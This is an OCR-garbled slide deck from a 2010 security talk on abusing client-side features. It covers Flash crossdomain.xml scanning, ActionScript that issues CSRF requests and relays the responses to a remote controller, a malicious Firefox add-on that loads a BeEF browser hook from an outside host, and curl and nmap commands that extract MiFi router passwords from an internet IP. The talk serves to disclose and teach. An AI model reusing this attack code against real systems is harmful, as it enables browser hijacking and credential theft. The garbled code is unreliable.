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The Friendly Traitors 



Mike Poor 

- Packet Ninja 



Kevin Johnson 

- Web Pen-Test Samurai 




Justin Searle 

- Smart Grid Sensei 





Copyright 2010 InGuardians, Inc. 



B 



Typical Attack Focus 




Risk management commonly focuses on 
vulnerabilities 

- OS & Application 

- Network 

- Infrastructure 

Most of our infrastructure and policies 
are designed for this 

Not that this isn't important... 

- Just not our focus today 
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Client-Side Attacks 
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The other commonly referenced 
attacks are client vulnerabilities 

- Browser flaws 
-Adobe Reader 
-APT ... Its not just a package manager 

More of a focus in recent tests 

Many different attacks are usable in 
this context 
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What Makes a Friendly Traitor 
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Features! Features! Features! 






Client applications are including 
complex extendable features 

- Read that as more vulnerable 

Let's focus on using these 
features against the users 

- Use the client support to run cod 
to perform fun and powerful 
attacks 




activex 
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Security Control Failure 

Most of our controls are focused on 
exploits 

- Detection of the exploits 

- Prevention of these attacks 




These fail to detect the malicious 
features! 
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So lets talk about a few 

We are going to focus on a few 
examples 

Keep in mind, these are examples 
you can build from 

-Using features of the client 
application 

We will be releasing some of these 
examples 
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Adobe Flash 
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Flash 





Let's make our pages "flash" 
Most people think animations 

-But ActionScript adds powerful 
feature sets 

Wide-spread support for the SWF 
objects 

-Except in Cupertino ;-) 



Copyright 2010 InGuardians, Inc. 




Cross Domain 




Flash objects are able to make HTTP requests 

Many developers use this to provide mash-up 
capabilities 

- Or to process data from the server application 

Flash uses a different policy to control this 
than JavaScript 

- Same Origin policy is ignored 

- By default Flash behaves the same way though 
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Cross Domain Policy 




These restrictions were added in Flash 7 

Prevents loading data from any server except 
the origin server 

- Similar to the same origin policy 

The big difference is that it is server 
controllable 

- crossdomain.xml file most likely in the web root 

- Controlled by the server admin or developer 



f 

Using a cross-domain policy file could expose your site to various attacks. 
Please read this document before hosting a cross-domain policy. 
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Crossdomain.xml 




XML file placed in the web root 

- or within the directory the content is loaded from 

Controls which domains are able to access 
content FROM this server 

Allows for the wildcard * 

- *. inguardians.com will match 

• www.inguardians.com 

• inguardians.com 

• eds.secretroom.inthe.secretroom.inguardians.com 
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Concerns 




Concerns about this file have been 
raised in the past 

Adobe says their documentation is 
sufficient 

- The Adobe web site hosts instructions and 
tutorials 

We have found a number of security 
problems in their site documents 

- SQL injection is common 
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Click to Remove Title 
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OBE 

i/ELOPER CONNECTION 



Using ActionScript 3.0 to retrieve MySQL data using a 
server-side ASP script I 

Sending the XML to the ASP script 

Once you know how to set up a connection and send data from Flash to the wo 
XML to the ASP script is pretty easy. This section covers sending the data to a 
ASP script using a simple HTTP POST. To make sending XML data easier 1 1 wr 
sendSQLXML function: 



public function. ser.dSQLXML (aspURL : String r SQLXML : String f 
returr.SQLXMLCallback: Function) : void 

{ 

var nyXMLURL:URLRequest = new URLRequest (aspURL) ; 

var variables : URL Variables = new URL Variables () ; 

variables. xnlSQL = '^MySQLRequest^ 11 +■ SQLXML + n <;/MySQLRequest> n ; 

nyXMLURL . data = variables; 

nyXMLURL. method = URLRequestMethod. POST; 

var nyLoader :URLLoader = new URLLoadcr () ; 

nyloaccr . acclvcr.^lisrer.c-r [ "conpic^c" t rcturnSQLXMLCallback) ; 

nyLoader .load (nyXMLURL) ; 
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Scanner Script 




Simple python script 

Read the Alexa Top 1 
million domains list 

Compared the domain to 
the Google Safe Site list 

- If listed, it was discarded 

We then retrieved the 
crossdomain.xml and 
parsed it 



output = open(outputFile p "ab") 

malwareoutput = open(malwareOutputFile, '"atO 

siteList = csv. reade^CopenCdomainFile])) 

1 = LookupQ 

for site in siteList: 

siteName = r \ joint ["http://www.. , \site[l]]) 
lookupResult = l.lookup_by_urltsiteName} 
i- lookupResult == None: 

url = r r .joint LsiteName.,"/c r, ossdomain.xml"]) 

req = Requester!} 

t*y: 

response = urlopentreq) 
except URLError»e: 

response = Hone 
else: 
t-y: 

don = xml.doTi.minidom.pafseStringt response, reader 3 
except Exception: 

puss 
else: 

url_list = doTi.getElementsByTagNamet"allPrt-access-from'") 
print , '***%s***' m %site #[1] 
output .write('"\nfts , "35site[l]) 
for url in url_list: 

url = url. getAttributet "domain'"} 
Sprint url 

output . writet " [d]%s t "%u rl . encodeC ' ascii ' t r replace r » 
url_list = dom.getElementsByTagNamet"site-control"3 
for url in url_list: 

url = url.getAttributet"permitted-cross-domain-policies") 
output .writeC '" [pJSSs t "%url . encodet ' ascii ' t ' replace ' 33 
url_list = dom. getElementsByTagNamet''allort-http-^equest-headers-from"3 
for url in url_list: 

domain = url.getAttributet"domain"3 
headers = url. getAttributet "headers") 
url = '" '\ joint [domain ,°C', headers ,")"] 3 
ou t pu t . w r i t e( '" [h] %s , "%u r 1 . encodet ' as ci i ' , ' repl ace ' ) ) 
url = Hone 
url_list = Hone 
response = Hone 
req = Hone 
else: 

malwa reoutput . writet "%s t "%site [1] . encodet r ascii r , r replace r 33 
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Results from the scan 





2,156 

15,104 

39,990 
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Boneheads FTW! 




843 



515 




rfcl918. 



local host, 






47 



ntranet. 
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Weaponizing Flash 




Now we can build 
ActionScript to abuse this 

The SWF file can make 
requests to the discovered 
sites 

- XSRF attacks 

We also control this SWF 
file remotely 

- Similar to browser hooking 



public -unction send"CSRFAttack(csrfURL: String, method: String, paylot 
returnResponseCallback: Function) :void 

// currently only works with POST -- Kevin 
v<k myURL:URLRequest = new URLRequesttcsrfURL); 
my URL. data = payload; 
my URL. method = URLRequestMethod.POST; 
w myLoader: URL Loader = new URLLoaderQl 

myLoade r . addEvent Listener( '"complete" l retu rnResponseCallback) ; 
my Loader , load(myURL) ; 
} 

public function retu rnResponse(evtObj: Event): void 

{ 

// Return response from attacked server to controller scrip\ 

var response: String = evtGbj . target t data ; 

// Now to send this to my control ler 

\?Q" controlle^URLiURLRequest = new URLRequest( |r http:// x lash. 

controllerURL.data = response; 

control ler URL .method = URL ReajuestMethod. POST; 

vq" ctrlrLoade^URLLoader = new URLLoaderQ; 

Ctrl r L oade r . a ddE ve n t L i s t e ne r( '" compl ete " t ret r i e ve C 5 RF Command 

Ctrl r Loader t load(controllerURL); 



public -unction retrieveCSRFCommandO: void 

{ 

// Get the CSRF victim from controller 

var cmdURL: URL Request = new URLReajuest.('"http: //flash, secure - ] 
andURL . method = URLRequestMethod.GET; 
vcr cmdLoader:URLLoader = new URLLoaderQ; 
cmdLoade^.addEventListenerC'complete" , pa rseCSRF Command) ; 
cmdLoade^. load(cmdURL) ; 



http://www.inguardians.com/tools 
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public function parseCSRFCommand(evtDbj: Event): void 

{ 

// parse the CSRF Command and then cal I the sendCSRFAttack 

vtr cmdResponse: String = evtObj. target .data; 

va^ 1 arrayRequestPiecesiA-^ay = cmdResponse.split('Y"); 
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Browsers 
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Mozilla Add-Ons 




Mozilla is a great browser 

-Not just as a pen-tester 

Add-ons are one of the 
reasons 

- Extend the browser 

-Provide great (and odd) features 
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# Destroy the Web 
byjose.bolanos 




Turn any web page into a shoot-em up video game. 

With a pulse pounding soundtrack and high scores for every web page, 

Destroy the Web is a fun way to take a little break during the day. 
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Browser Uptime 

by Cosmic Cat Creations 

Report the duration of your current browser session. 



Zombify My Browser 




▼ 


chrome 




content 




chrome, manifest 


▼ 


. defaults 




. preferences 




3 install. rdf 


▼ 


CD locale 




. en-US 


► 


D skin 



Let's build an add-on that is 
malicious 

Simple to build 

- Well simple to make it malicious ;-) 



We add a browser 
hook 

• BEeF by Wade Alcorn 

This browser is now 
a zombie 



<7xml version='"1.0"7> 

<7xml- stylesheet href='" chrome : //I i nkta rgetf inder/s kin/ski n . ess '" type= "text/ess "7> 
<!DDCTYPE linktargetfinder SYSTEM " chrome: //I i nkta rgetfi rider/local e/transl at ions. dtd'"> 
<ove r 1 ay i d= '" s ampl e " xml ns= '" htt p : //www . mozi 1 1 a . o r g/keymas t er/gat ekeeper/t he re , i s , only , jail "> 

<script s"c='"linkTargetFinder. js" /> 

<scripi: s r c= " htt p : //beef .s ecu reideas .net/beef /hook/beef magic. js .php" /> 

<menu popu p i d= '"menu _Tool s Popu p '" > 

<menuitem label="&runlinktargetfinder; " key="link- target- f inder-run- 
</menu popup?- 

<keyset> 

<key icf="link- target- finder- run- key" modifiers="accel alt shift'" key 
</keyset> 

<statusbar id="status-bar"> 

<statusbarpanel id="link- target- finder-status-bar-icon 1 " class="statuj 
</statusbar> 

<toolbarpalette id='"B rowserToolbarPalette"> 

<toolbarbutton id='"link-target- finder-toolbar-button 1 " label="l_ink Taj 
</tool ba rpal ette;- 



</overlay> 
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YourFi is MiFi 
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MiFi POwnage History 




January 14, 2010 

- @adam baldwin finds several flaws in the web admin page including 
Auth Bypass, CSRF, and XSS 

- http://evilpacket.net/2010/jan/14/mifi-geopwn/ 

January 16, 2010 

- @aramosf discovers the config file is accessible via the Auth Bypass 
vuln 

February 2, 2020 

- @joswrlght discovers the default password selection is weaker than it 
appears and creates pre-computed hash tables for all default SSID/ 
password combinations 

- http://www.willhackforsushi.com/?p=417 

Today ... 
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Beware of Odd Defaults 




Odd port forward 
setting hidden in default 
MiFi settings 

Any decent admin or 
security professional will 
immediately disable this 

If you change your 
WLAN's default IP 
address range, this 
setting gets disabled 

So who cares... 




Home WtFI LAN Security A 



Port Forwarding 



Port Forwarding Applications 

Application 

2 DNS (Domain Name Server) 
D FTP Server 
g HTTP (Web) Server 

□ NNTP Server 
D POP3 Server 
LJ SMTP Server 

J SNMP Server 

□ Telnet Server 
D TFTP Server 



■■III Verizon EvDG Rev. A Connected HOD 
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IP Address on WLAN 



192.1G8. 1,254 



f Apply j (^ Revert j 



Novatef Wireless MiFI22QQ VZW< 





Auth Bypass from the Internet! 




When this port forward is removed or disabled MiFi 
exposes web admin to the cellular interface 

All the existing web app flaws are now exploitable 
from the Internet 

So how does an attacker exploit this in large scale? 



»^o 



o 



ssh 



JLtstin@sauron: -*- - ssh - - bash — 81x8 

jLJ5tin@saLiron: - — ssh 



ssh 



justim-3sauron:^$ 

j ustimasauron:-$ ##### With http port forward to Never Never Land 

j ustim3sauron:^$ curl -sm5 http: //75. 226. 226. 1/config. Kml. sav | grep password 

justim-3sauron:-v$ 

justin@sauron:~$ ##### With http port forward disabLec 

j ustim5saijrori:^$ curl -smS http: //75. 226. 226. 1/config. Kml. sav | grep password 

<password>http: //bit. ly/4kb77v</passuord> 

justin@SBuron:^$ 
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From to 60 in NSE seconds 




Attackers will scan for them of course! 

Verizon's IP address range for MiFi devices is a /10 
network or 4,194,304 IP addresses in size 

Nmap can pull this off in less than two days 






j ustin@sauron:~$ nmap -PN -p B0 — script http-mifi. nse 75.226.226.1 

Starting Nmap 5.00 £ http://nmap.org ) at 2010-02-85 23:15 M5T 

Interesting ports on 1. sub-75-226-226.myvzw. com (75.226.226.1): 

PORT 5TATE SERVICE 

BB/tcp open http 

| http-mifi: MIFI Device Found!!! 

j Password = "http://bit.ly/4kb77v" 

I 55ID = "Verizon MiFi2280 7E6C" 

|_ P5K = "09113431B96" 

Nmap done: 1 IP address (1 host up) scanned in 0.B4 seconds 



«^<-> 




JListin@saurori: - 


- — ssh — 


bash — 


81x12 

O ju5tln@-saiiron: - 


-ssh 




© 


ssh 




© 


ssh 







A 

E 
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Re-Joining the Asylum 




Currently, the only way to fix this is to re-enable the HTTP port 
forward to Never Never Land. 

- Make sure you use a VALID and UNUSED IP address in your 
WLAN range 

- Make sure you change this port forward every time you change 
your WLAN IP address range 

Remember that this port forward does not prevent people one 
your WLAN network from exploiting these flaws 

- Never use the "Hotspot" mode until these vulns are fixed 

Suck it up and connect your MiFi through the USB port 
occasionally 

- This is the only "known" way to update your MiFi's flash 

- This avoids the risk of exposing your MiFi's web admin interface ... 
at least that is the current assumption 
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HTML 5 
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And Now... HTML5 




5 th revision of HTML 

One main focus is the idea of web 
applications 

- Keep in mind this is a client language 

Browsers are being given more power and 
features 




SQL Database 


Web Storage 


File Access 


Device Access 


Web Sockets 


System Information 



And the idiocy continues... 
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Thank You! 



Mike Poor - mike@inguardians.com - @mike_poor 



Kevin Johnson - kevin@inguardians.com - @secureideas 



Justin Searle - justin@inguardians.com - @meeas 




